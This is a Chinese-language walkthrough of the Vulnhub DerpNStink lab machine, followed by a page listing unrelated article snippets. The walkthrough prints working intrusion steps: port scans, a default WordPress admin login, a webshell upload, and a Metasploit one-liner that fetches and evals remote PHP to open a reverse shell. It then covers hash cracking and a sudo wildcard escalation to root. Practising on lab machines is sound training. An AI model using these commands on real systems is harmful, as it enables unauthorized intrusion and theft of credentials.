zhaji001
zhaji001

Vulnhub DeRKnStiNK

简介

虚拟机下载: https://www.vulnhub.com/entry/derpnstink-1,221/

靶机: 使用Virtualbox虚拟机导入OVA

攻击机:kali linux 

0x001  信息收集

nmap扫描网络找到VM ip地址 

nmap -sn 192.168.1.100-254
Nmap scan report for 192.168.1.105
Host is up (0.043s latency).
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)

0x002  TCP UDP端口扫描

tcp

nmap -n -A -p- 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 16:57 CST
Nmap scan report for 192.168.1.105
Host is up (0.0067s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

udp 

nmap -n -A -sU 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 17:09 CST
Nmap scan report for 192.168.1.105
Host is up (0.0055s latency).
Not shown: 954 closed ports, 45 open|filtered ports
PORT     STATE SERVICE VERSION
5353/udp open  mdns    DNS-based service discovery
| dns-service-discovery: 
|   9/tcp workstation
|_    Address=192.168.1.105 fe80:0:0:0:a00:27ff:fe2d:1b31
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

0x003 侦查

HTTP   在112行 找到了flag1   

<!--http://192.168.1.105/-->


<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->

FTP  需要用户名和密码 不允许匿名访问

nc 192.168.1.105 21
220 (vsFTPd 3.0.2)
USER root
530 Permission denied.



nc 192.168.1.105 21
220 (vsFTPd 3.0.2)
USER stinky
331 Please specify the password.

ssh  需要密钥

ssh [email protected]

[email protected]: Permission denied (publickey).

0x004 web目录爬取

Burp Spider 找到二个有趣的URL

http://192.168.1.105/webnotes/
http://192.168.1.105/webnotes/info.txt

dirb

dirb http://192.168.1.105/ -o dirb.log

...内容太多省略...

提取URL

cat dirb.log | grep "CODE:200" | cut -d" " -f2 > dirburls.txt
cat dirb.log | grep "==> DIRECTORY:" | cut -d" " -f3 >> dirburls.txt

Eyewitness抓取URL

eyewitness --web -f /root/dirburls.txt
.........
.........
[*] Done! Report written in the /usr/share/eyewitness/01152019_184614 folder!
Would you like to open the report now? [Y/n] Y

打开文件将发现两个比较有趣的URL

http://192.168.1.105/php/phpmyadmin/ #用户信息 将之关注第二个URL
http://192.168.1.105/weblog/

添加域到host文件 重定向到http://derpnstink.local/weblog/

echo "192.168.1.105  derpnstink.local" >> /etc/hosts

再次访问博客

http://derpnstink.local/weblog/

查看源码将发现如下URL  并不能执行cmd

  • 
					
    Slideshow
    
											http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/derp.png
										
    
																		
															
    • 
					
				
  • 
					
    h0m3l4b1t
    
											http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php
										
    h0m3l4b1t
    
																		
															
    • 
					
				
  • 
					
    h0m3l4b1t
    
											http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php
										
    h0m3l4b1t
    
																		
															
    • 
					
				
  • 
					
    randonx
    
											http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/elidumfy.php
										
    randonx
    
																		
															
    • 
					
				
  • 
					
    randonx
    
											http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/uoukbgmr.php
										
    randonx
    
																		
															
    •

    0x005 CMS识别

    从网页最下方发现CMS是WordPress站点 接下来利用wpscan

    wpscan --url http://192.168.1.105/weblog

    访问博客管理页面  尝试若口令 username:admin password:admin 可以登录

    0x006 get webshell

    通过上传图片 上传webshell

    cat webshell.php

    访问执行cmd

    http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/webshell.php?cmd=%20ls

    Meterpreter shell

    msf > use multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set TARGET  1
TARGET => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.103
lhost => 192.168.1.103
msf exploit(multi/script/web_delivery) > set srvport 8989
srvport => 8989
msf exploit(multi/script/web_delivery) > exploit 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.103:4444 
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8989/XFHqfm2xqfO
[*] Local IP: http://192.168.1.103:8989/XFHqfm2xqfO
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.103:8989/XFHqfm2xqfO'));"

    URL执行cmd

    http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/webshell.php?cmd=%20php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.1.103:8989/XFHqfm2xqfO%27));%22

    发现权限特别的低

    msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
/var/www/html/weblog/wp-content/uploads/slideshow-gallery
meterpreter > shell
Process 2091 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
alse
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false

    wordpress数据库的配置

     cat /var/www/html/weblog/wp-config.php

    0x007 root权限

    使用之前找到的数据库 用户root 密码mysql 登录 http://192.168.1.105/php/phpmyadmin/

    在wp_user表中 找到用户的哈希密码  在mysql user表中找到用户哈希密码 
    unclesticky 密码是经过加盐  使用知道的admin哈希密码进行替换  $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

    MySQL哈希 * 9B776AFB479B31E8047026F1185E952DD1E530CB对应的密码为wedgie57 URL哈希查询https://crackstation.net/

    0x008 获取flag2

    unclestinky  admin  登录

    http://derpnstink.local/weblog/wp-login.php

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

    0x009 访问FTP

    ftp://192.168.1.105  用户stinky 和 mysql密码相同 wedgie57

    得到了密钥ftp://192.168.1.105/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt

    0x010 flag3

    修改本地密钥文件连接

    chmod 700 ~/.ssh/id_rsa

/。。。。。


stinky@DeRPnStiNK:~$ cat Desktop/flag.txt 
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

    包含mrderp的Wordpress凭据的pcap文件

    stinky@DeRPnStiNK:~$ ls Documents/
derpissues.pcap

    使用Wireshark读取derpissues.pcap

    mrderp的密码:derpderpderpderpderpderpderp

    换到mrderp用户

    stinky@DeRPnStiNK:~$ su mrderp
Password: 
mrderp@DeRPnStiNK:/home/stinky$ 


mrderp@DeRPnStiNK:~$ cat Desktop/helpdesk.log 
Thank you for contacting the Help Desk. Your ticket information and its resolution is
below.

    0x011 root flag4

    mrderp@DeRPnStiNK:~$ sudo su
[sudo] password for mrderp: 
Sorry, user mrderp is not allowed to execute '/bin/su' as root on DeRPnStiNK.
mrderp@DeRPnStiNK:~$

    mrderp不允许运行/bin/susudo

    mrderp@DeRPnStiNK:~$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~$

    创建名为名为derpy.sh的脚本

    mrderp@DeRPnStiNK:~$ cd /home/mrderp/
mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ echo "/bin/bash" > binaries/derpy.sh
mrderp@DeRPnStiNK:~$ chmod +x binaries/derpy.sh 




mrderp@DeRPnStiNK:~$ sudo ./binaries/derpy.sh 
root@DeRPnStiNK:~# id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~# cat /root/
.bash_history         .compiz/              Desktop/              Downloads/            .ICEauthority         .mysql_history        .Xauthority           
.bashrc               .config/              .dmrc                 .gconf/               .local/               .profile              .xsession-errors      
.cache/               .dbus/                Documents/            .gvfs/                .mozilla/             .ssh/                 .xsession-errors.old  
root@DeRPnStiNK:~# cat /root/Desktop/flag.txt 
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) #拿到了flag4

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo


root@DeRPnStiNK:~#

     

    你可能感兴趣的:(靶机练习)

    • CISP-PTE考试通关经验 Python_chichi 互联网职业发展科技android
      考试题型考试题型氛围选择题(20分)+基础题(50分)+综合题(三个key30分),70分以上通过,也就是选择题保证10分以上,基础题全做出来的话,至少要做出综合题第一道小题。一、选择题主要考察基础知识,前四天老师都有讲,另外还发了一些题库,看一遍的话,基本考10分以上问题不大。二、基础题1.sql注入第一题sql注入是一个文章发表系统,培训的时候靶机练习有做过,但是不太一样,注册用户登录之后,注
    • Gaara靶机练习 郑居中3.0 Gaara靶机gdb提权
      渗透测试一.信息收集1.确定IP地址2.nmap扫描3.目录扫描二.hydra爆破1.ssh连接2.信息探索三.提权gdb提权提权一.信息收集1.确定IP地址┌──(root㉿kali)-[~/kali/web]└─#arp-scan-lInterface:eth0,type:EN10MB,MAC:00:0c:29:10:3c:9b,IPv4:192.168.9.10Startingarp-sca
    • Neos的渗透测试靶机练习——DarkHole-2 Dr.Neos 靶场练习渗透测试网络安全sqlgit服务器
      DarkHole-2一、实验环境二、开始渗透1.搜集信息2.git文件泄露3.SQL注入4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DarkHole-2(网卡初始为仅主机模式,要有安全意识)靶机网卡有问题需要提前修改,进入系统前先按shift,然后按e进入编辑模式,将ro至initrd之前的内容修改为rwsing
    • Neos的渗透测试靶机练习——DarkHole-1 Dr.Neos 靶场练习网络安全渗透测试网络安全web安全
      DarkHole-1一、实验环境二、开始渗透1.搜集信息2.sql注入4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DarkHole-1(网卡初始为仅主机模式,要有安全意识)靶机网卡有问题需要提前修改,进入系统前先按shift,然后按e进入编辑模式,将ro至initrd之前的内容修改为rwsingleinit=/b
    • Neos的渗透测试靶机练习——DC-8 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
      DC-8一、实验环境二、开始渗透1.搜集信息2.sql注入(1)测试注入点(4)sqlmap3.PHP上传,反弹shell4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-8(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身i
    • Neos的渗透测试靶机练习——DC-9 Dr.Neos 靶场练习网络服务器渗透测试安全网络安全
      DC-9一、实验环境二、开始渗透1.搜集信息2.sql注入3.文件包含漏洞4.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-9(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.16
    • Neos的渗透测试靶机练习——DC-7 Dr.Neos 靶场练习网络安全渗透测试网络安全web安全
      DC-7一、实验环境二、开始渗透1.搜集信息2.文件上传3.提权三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-7(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.168.56.101。
    • Neos的渗透测试靶机练习——DC-5 Dr.Neos 靶场练习安全渗透测试网络安全web安全网络
      DC-5一、实验环境二、开始渗透1.搜集信息2.文件包含漏洞3.反弹shell三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-5(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.168.
    • Neos的渗透测试靶机练习——Wakanda Dr.Neos 靶场练习安全渗透测试网络安全web安全
      Wakanda一、实验环境二、开始渗透(根据流程学习思路)1.获知本机IP、靶机IP2.靶机端口、协议、前端信息(Nmap)3.进入后台,查看敏感数据三、总结一、实验环境虚拟机软件:VirtualBox攻击机:KaliLinux(仅主机模式)靶机:Wakanda(仅主机模式,共有3个flag)二、开始渗透(根据流程学习思路)1.获知本机IP、靶机IP切换到root用户(输入sudosu及对应的密码
    • Neos的渗透测试靶机练习——DC-3 Dr.Neos 靶场练习网络安全渗透测试网络安全web安全
      DC-3一、实验环境二、开始渗透1.搜集信息2.sqlmap3.上传PHP木马三、总结一、实验环境虚拟机软件:VirtualBox攻击机:kalilinux(网卡初始为仅主机模式,要有安全意识)靶机:DC-3(网卡初始为仅主机模式,要有安全意识)二、开始渗透1.搜集信息输入sudosu,将kali切换到root权限;输入ifconfig查询自身ip,即攻击机ip;可以看到自身ip为192.168.
    • 渗透测试-靶机DC-2-知识点总结 Dr.Neos 靶机-知识点总结安全渗透测试网络安全web安全网络
      靶机DC-2-知识点总结一、前言二、实验环境三、渗透测试工具1.cewl(1)cewl简介(2)cewl常见用法2.wpscan(1)wpscan简介(2)wpscan常见用法直接扫描-eu爆破用户名-U、-P爆破账户密码3.dirb(1)dirb简介(2)dirb常见用法四、渗透测试技巧1.rbash逃逸2.git提权五、总结一、前言本次渗透测试具体流程详见Neos的渗透测试靶机练习——DC-2
    • hackmyvm Rei靶机练习 活着Viva hackmyvm渗透测试
      主机发现端口扫描漏洞挖掘权限提升主机发现攻击机ip靶机ip-sn发送arp请求包探测目标ip是否在线端口扫描-p-所有端口扫描-sV查询开放端口的服务这里65333是ssh服务,63777是http服务最好拿个记事本记住漏洞挖掘浏览靶机的默认页面,查查有什么漏洞它说indexp.txt在web的默认目录,那我访问一下。indexp.txt下显示了哪些目录可以访问,哪些目录不可以访问,类似于robo
    • vulnhub靶机练习-Os-hackNos Asson
      0x01靶机简介Difficulty:EasytoIntermediateFlag:2FlagfirstuserAndsecondrootLearning:exploit|WebApplication|Enumeration|PrivilegeEscalationWebsite:www.hackNos.commail:[email protected]靶机下载https://www.vulnh
    • Linux靶机练习 小小西贝 LinuxWeb安全靶机练习安全网络安全linux
      文章目录第1次Lampiao1.信息收集1.1netdiscover扫描1.2namp扫描第1次扫描第2次扫描1.3御剑扫描打开扫描到的文件打开登录网站sql注入链接跳转node/1node/3node/22.漏洞探测2.1利用cewl获取网站信息2.2ssh进行登录查看靶机信息:3.提权3.1利用脏牛提权3.2对40847文件的操作3.3tiago用户下载40847.cpp文件3.4获取root
    • 靶机练习2之利用Linux版本内核漏洞实现本地权限提升 yuan_boss 保护国家网络安全linuxubuntu靶机本地权限提升漏洞kali
      文章目录信息收集1.扫描网段2.扫描敏感目录渗透阶段密码爆破查看主机内核查找版本漏洞查看漏洞详细信息拷贝漏洞到本地将漏洞文件传到靶机漏洞利用信息收集1.扫描网段建议开启两个终端,首尾扫描,提高速度与准确性从0开始扫描nmap10.9.136.0/24从后面开始扫描nmap-r10.9.136.0/24扫描完成后,发现有个主机10.9.136.231开放了80端口,直接访问该主机,发现只有一个图片,
    • Vulnhub-Raven1 靶机练习 GloryGod Vulnhub网络安全网络安全
      靶机地址:Raven:1~VulnHub1.基本信息Kali:192.168.26.131靶机:192.168.26.1362.信息收集arp-scan-l或者nmap-sn192.168.26.0/24之后进行全端口扫描,保证自己的隐蔽性(假设真实环境)nmap-sT--min-rate10000-p-192.168.26.136-oA./nmap_report/raven1/port紧接着进行
    • 靶机练习 No.23 Vulnhub靶机DarkHole 2 .git信息泄露 .bash_history历史命令提权 LuckyCharm~ 靶机学习安全
      靶机练习No.23Vulnhub靶机DarkHole20x00环境准备0x01信息收集步骤一:ip探测步骤二:端口扫描0x02漏洞挖掘思路一:web漏洞挖掘(.git信息收集)思路二:22ssh爆破步骤一:githack.py收集.git步骤二:从git仓库审查代码及数据库文件(1)config/config.php(2)审计index.phplogin.phpdashboard.php步骤三:g
    • 【靶机练习】Vulnhub靶场Earth-练习记录 小白帽的成长 网络安全渗透测试linux服务器centos
      注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开信息收集攻击机IP:192.168.43.118主机发现:sudonmap-sP192.168.43.1/24确认目标机IP:192.168.43.241端口扫描:sudonmap-sC-sV-p-192.168.43.241扫描结果:目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。没修改hosts
    • SQL注入靶机练习:BUU SQL COURSE 1 燕麦葡萄干 渗透测试学习渗透测试SQL注入BUUCTF
      SQL注入靶机练习:BUUSQLCOURSE1一、SQL注入知识点二、前置知识三、SQL注入测试的一般步骤四、解题过程一、SQL注入知识点可参考SQL注入详解二、前置知识参考来源:渗透攻防Web篇-深入浅出SQL注入mysql5.0以上版本中存在一个重要的系统数据库information_schema,通过此数据库可访问mysql中存在的数据库名、表名、字段名等元数据。information_sc
    • Vulnhub靶场-DC-1靶机练习 .风溪. DC靶机
      Vulnhub-DC-1daoyuan##零、环境配置1、虚拟机:vmware15.5.62、攻击环境:kalilinux2020.3192.168.143.1283、靶机:DC-1靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。一、攻击过程一、主机存活扫描arp-scan-l探测到目标ip:192.168.143.134二、端口扫描namp-A-p-192.168.143.1
    • Vulnhub靶场-DC-2靶机练习 .风溪. DC靶机
      Vulnhub-DC-2daoyuan零、环境配置1、虚拟机:vmware15.5.62、攻击环境:kalilinux2020.3192.168.143.1283、靶机:DC-2靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。一、信息收集1、主机存活扫描arp-scan-l2、端口扫描nmap-A-p-192.168.143.135发现开放的端口以及服务80wordpress7
    • JIS-CTF: VulnUpload 靶机练习 yemansleep
      1.靶机介绍VM名称:JIS-CTF:VulnUpload难度:初学者说明:此机器上有五个标志。试着找到它们。平均需要1.5小时才能找到所有旗帜。2.信息收集2.1对靶机进行端口扫描,发现只有80,22端口开放image.png2.2查看网站的robots.txt发现有如下目录User-agent:*Disallow:/Disallow:/backupDisallow:/adminDisallow
    • 做一个靶机练习_djinn 五行缺金 golang
      前几天一直在背资料,背的很烦,找个靶机来玩玩.第一件事,先找一下主机地址,由于我在自己的局域网内,我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话,可以用nmap检测一下,sS是指用半开放式扫描,不会完成三次握手,速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
    • 做一个靶机练习_djinn 五行缺金 golang
      前几天一直在背资料,背的很烦,找个靶机来玩玩.第一件事,先找一下主机地址,由于我在自己的局域网内,我不用扫也知道这台刚开的主机ip是多少...但如果不知道的话,可以用nmap检测一下,sS是指用半开放式扫描,不会完成三次握手,速度要快一点sudonmap-sS192.168.1.0/24扫描结果如下Nmapscanreportfordjinn(192.168.1.8)Hostisup(0.0001
    • 渗透测试靶机练习(一)之lazysysadmin 不断积淀 渗透测试
      lzaysysadmin情报搜集主机发现,使用netdiscover主机扫描,使用nmap使用dirbuster进行网站目录扫描可以看到扫描结果,有workpress和phpmyadmin登录网站,查看robots.txt文件存在目录遍历漏洞,但是没有发现可用信息可以尝试爆破一下phpmyadmin的登录口令和wpscan扫描一下主机扫描中发现445端口共享文件发现三个共享的文件夹Linux下挂载
    • DC-5靶机练习 水中煮鱼冒气 靶机练习
      DC-5靶机练习文件下载链接第一部分信息收集第一步信息收集第二步扫描开放的端口第三步访问80端口[打开Contact页面,发现是一个留言板块,在留言板块输入内容并提交]第四步:观察网页第二部分文件包含漏洞第一步:使用BurpSuite抓包,爆破后台页面[发现存在index.php,solutions.php,about-us.php,faq.php,contact.php,thankyou.php
    • 靶机练习 - ATT&CK红队实战靶场 - 1. 环境搭建和漏洞利用 Sally_Zhang
      最近某个公众号介绍了网上的一套环境,这个环境是多个Windows靶机组成的,涉及到内网渗透,正好Windows和内网渗透一直没怎么接触过,所以拿来学习下。下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/环境配置和检查加上kali一共四台虚拟机。win7x64需要配置两张网卡,一个在内网网段,一个在外网网段,配置如下(VM默认只有一张网卡,
    • Pikachu 通关笔记 BROTHERYY 靶场练习
      Pikachu靶机练习1、暴力破解1.1基于表单的暴力破解1.2验证码绕过(onserver)1.3验证码绕过(onclient)1.4验证码绕过(token防爆破)2、Cross-SiteScripting-XSS2.1反射型(get)2.2反射型(post)2.3存储型xss2.4DOM型xss2.5DOM型xss-x2.6XSS之盲打2.7XSS之过滤2.8xss之htmlspecialch
    • DC-1入门练习 Mr H
      **渗透测试入门靶机练习DC-1**大家好!第一次搭建自己的博客,对这个环境有点陌生,作为一名网络安全学习者很高兴为大家提供一些踩坑经验以及学习教程如有不足,或错误还请大家指点。#环境搭建1.首先准备好DC-1靶机,其实就是一个虚拟机ova文件下载地址:https://download.vulnhub.com/dc/DC-1.zip其他DC靶机地址只需修改上面DC-后面数字即可2.打开次虚拟机创建
    • LazySysAdmin 渗透靶机练习 林家大公子 渗透学习
      下载链接:https://www.vulnhub.com/entry/lazysysadmin-1,205/扫描目标主机...省略输出有用的信息包括:http://x.x.x.x/phpmyadmin/http://x.x.x.x/wordpress/wp-adminhttp://x.x.x.x/wordpress/找到疑似用户名的:togie使用enum4linuxx.x.x.x,查找有用信息。
    • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
      spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
    • 实习简要总结 byalias 工作
      来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
    • Quartz——DateIntervalTrigger触发器 eksliang quartz
      转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
    • Unix快捷键 18289753290 unixUnix;快捷键;
      复制,删除,粘贴: dd:删除光标所在的行                             &nbs
    • 获取Android设备屏幕的相关参数 酷的飞上天空 android
      包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
    • 要做物联网?先保护好你的数据 蓝儿唯美 数据
      根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
    • Java取模(求余)运算 随便小屋 java
              整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
    • SQL注入介绍 aijuans sql注入
      二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
    • 优雅代码风格 aoyouzi 代码
      总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
    • 布尔数组 百合不是茶 java布尔数组
        androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
    • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
      welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
    • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
       页面代码               <h:form id="fileForm">            <rich:
    • 技术文章备忘 bit1129 技术文章
      Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
    • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
      文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
    • sqlserver按照字段内容进行排序 bozch 按照内容排序
      在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
    • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
      import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
    • Java关于==和equals chenbowen00 java
      关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
    • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
            我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
    • oracle 数据块结构 daizj oracle数据块块结构行目录
      oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
    • github上一些觉得对自己工作有用的项目收集 dengkane github
      github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
    • 初二上学期难记单词二 dcj3sjt126com englishword
      dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
    • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
      一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
    • java循环标签 Foreach shuizhaosi888 标签java循环foreach
